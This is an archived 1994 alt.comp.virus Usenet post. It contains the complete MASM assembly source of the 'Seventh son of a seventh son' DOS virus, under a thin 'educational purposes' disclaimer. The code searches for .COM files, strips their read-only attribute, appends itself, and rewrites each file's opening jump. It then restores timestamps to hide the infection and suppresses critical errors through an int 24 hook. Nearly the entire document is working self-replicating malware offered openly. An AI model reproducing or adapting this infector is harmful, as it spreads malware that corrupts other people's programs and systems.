home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / SOURCE.ZIP / 7SON.ASM < prev    next >
Assembly Source File  |  1994-11-29  |  7KB  |  252 lines
  1. From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:42:48 1994
  2. Xref: netcom.com alt.comp.virus:506
  3. Path: netcom.com!ix.netcom.com!netnews
  4. From: Zeppelin@ix.netcom.com (Mr. G)
  5. Newsgroups: alt.comp.virus
  6. Subject: 7th Son Virus
  7. Date: 29 Nov 1994 13:02:59 GMT
  8. Organization: Netcom
  9. Lines: 236
  10. Distribution: world
  11. Message-ID: <3bf8q3$iaj@ixnews1.ix.netcom.com>
  12. References: <sbringerD00yHv.Hs3@netcom.com> <bradleymD011vJ.Lp8@netcom.com>
  13. NNTP-Posting-Host: ix-pas2-10.ix.netcom.com
  14.  
  15. ;***********************************************************************
  16. *****
  17. ;*  Seventh son of a seventh son    version 4
  18. ;*
  19. ;*  Compile with MASM 4.0
  20. ;*  (other assemblers will probably not produce the same result)
  21. ;*
  22. ;*  Disclaimer:
  23. ;*  This file is only for educational purposes. The author takes no
  24. ;*  responsibility for anything anyone does with this file. Do not
  25. ;*  modify this file!
  26. ;***********************************************************************
  27. *****
  28.  
  29. cseg            segment
  30.                 assume  cs:cseg,ds:cseg,es:cseg,ss:cseg
  31.  
  32.                 .RADIX  16
  33.  
  34. FILELEN         equ     end - start
  35. MINTARGET       equ     1000d
  36. MAXTARGET       equ     -(FILELEN+40)
  37.  
  38.  
  39.  
  40. ;***********************************************************************
  41. *****
  42. ;*              Dummy program (infected)
  43. ;***********************************************************************
  44. *****
  45.  
  46.                 org     100
  47.  
  48. begin:          db      4Dh                     ;virus mark
  49.                 db      0E9h, 4, 0              ;jump to virus entry
  50.  
  51.  
  52. ;***********************************************************************
  53. *****
  54. ;*              Begin of the virus
  55. ;***********************************************************************
  56. *****
  57.  
  58. start:          db      0CDh,  20h, 0, 0
  59.  
  60.                 cld
  61.                 mov     si,0100h
  62.                 push    si                      ;push new IP on stack
  63.                 mov     di,si
  64.                 add     si,[si+2]               ;si -> start
  65.  
  66.                 push    si                      ;restore original begin
  67.                 movsw
  68.                 movsw
  69.                 pop     si
  70.  
  71.                 mov     ax,3300h                ;get ctrl-break flag
  72.                 int     21
  73.                 push    dx
  74.  
  75.                 cwd                             ;clear the flag
  76.                 inc     ax
  77.                 push    ax
  78.                 int     21
  79.  
  80.                 mov     ax,3524h                ;get int24 vector
  81.                 int     21
  82.                 push    bx
  83.                 push    es
  84.  
  85.                 lea     dx,[si+(offset ni24 - 0104)]  ;set new int24 
  86. vector
  87.                 mov     ah,25h
  88.                 push    ax
  89.                 int     21
  90.  
  91.                 mov     ah,2Fh                  ;get DTA adres
  92.                 int     21
  93.                 push    es
  94.                 push    bx
  95.  
  96.                 add     dx,070h                 ;set new DTA adres
  97.                 mov     ah,1Ah
  98.                 int     21
  99.                 add     dx,1Eh
  100.                 push    dx
  101.  
  102.                 lea     di,[si+(offset generation-0104)]  ;check 
  103. generation
  104.                 cmp     [di],0707h
  105.                 jne     verder
  106.  
  107.                 lea     dx,[di+2]               ;7th son of a 7th son!
  108.                 mov     ah,09h
  109.                 int     21
  110.  
  111. verder:         mov     ax,[di]                 ;update generations
  112.                 xchg    ah,al
  113.                 mov     al,1
  114.                 mov     [di],ax
  115.  
  116.                 lea     dx,[di+33d]             ;find first COM-file
  117.                 xor     cx,cx
  118.                 mov     ah,4Eh
  119. infloop:        int     21
  120.                 pop     dx
  121.                 jc      stop
  122.  
  123.                 push    dx
  124.  
  125.                 xor     cx,cx                   ;clear 
  126. read-only-arttribute
  127.                 mov     ax,4301
  128.                 int     21
  129.                 jc      return1
  130.  
  131.                 mov     ax,3D02h                ;open the file
  132.                 int     21
  133.                 jc      return1
  134.                 xchg    bx,ax
  135.  
  136.                 mov     ax,5700h                ;get file date & time
  137.                 int     21
  138.                 push    cx
  139.                 push    dx
  140.  
  141.                 mov     cx,4                    ;read begin of file
  142.                 mov     dx,si
  143.                 mov     ah,3fh
  144.                 int     21
  145.  
  146.                 cmp     byte ptr [si],4Dh       ;already infected or an 
  147. EXE?
  148.                 je      return2
  149.                 cmp     byte ptr [si],5Ah       ;or a weird EXE?
  150.                 je      return2
  151.  
  152.                 mov     al,2                    ;go to end of file
  153.                 call    seek
  154.  
  155.                 cmp     ax,MAXTARGET            ;check length of file
  156.                 jnb     return2
  157.                 cmp     ax,MINTARGET
  158.                 jbe     return2
  159.  
  160.                 push    ax
  161.                 mov     cx,FILELEN              ;write program to end of 
  162. file
  163.                 mov     ah,40h
  164.                 int     21
  165.                 cmp     ax,cx                   ;are all bytes written?
  166.                 pop     ax
  167.                 jnz     return2
  168.  
  169.                 xchg    ax,bp
  170.                 mov     al,0                    ;go to begin of file
  171.                 call    seek
  172.  
  173.                 mov     word ptr [si],0E94Dh    ;write mark and 
  174. jump-command
  175.                 mov     word ptr [si+2],bp
  176.                 mov     ah,40h
  177.                 int     21
  178.  
  179.                 inc     byte ptr [di]           ;number of next son
  180.  
  181. return2:        pop     dx                      ;restore file date & 
  182. time
  183.                 pop     cx
  184.                 mov     ax,5701h
  185.                 int     21
  186.  
  187.                 mov     ah,3Eh                  ;close the file
  188.                 int     21
  189.  
  190. return1:        mov     ah,4Fh                  ;find next file
  191.                 jmp     short infloop
  192.  
  193. stop:           pop     dx                      ;restore DTA adres
  194.                 pop     ds
  195.                 mov     ah,1Ah
  196.                 int     21
  197.  
  198.                 pop     ax                      ;restore int24 vector
  199.                 pop     ds
  200.                 pop     dx
  201.                 int     21
  202.  
  203.                 pop     ax                      ;restore ctrl-break flag
  204.                 pop     dx
  205.                 int     21
  206.  
  207.                 push    cs
  208.                 push    cs
  209.                 pop     ds
  210.                 pop     es
  211.  
  212.                 ret
  213.  
  214. seek:           mov     ah,42
  215.                 cwd
  216. int21:          xor     cx,cx
  217.                 int     21
  218.                 mov     cl,4
  219.                 mov     dx,si
  220.                 ret
  221.  
  222.  
  223. ;***********************************************************************
  224. *****
  225. ;*              Interupt handler 24
  226. ;***********************************************************************
  227. *****
  228.  
  229. ni24:           mov     al,03
  230.                 iret
  231.  
  232.  
  233. ;***********************************************************************
  234. *****
  235. ;*              Data
  236. ;***********************************************************************
  237. *****
  238.  
  239. generation      db      1,1
  240. sontxt          db      'Seventh son of a seventh son',0Dh, 0Ah, '$'
  241. filename        db      '*.COM',0
  242.                 db      'é¿░│▒'
  243.  
  244. end:
  245.  
  246. cseg            ends
  247.                 end     begin
  248.  
  249.  
  250.  
  251.  
  252.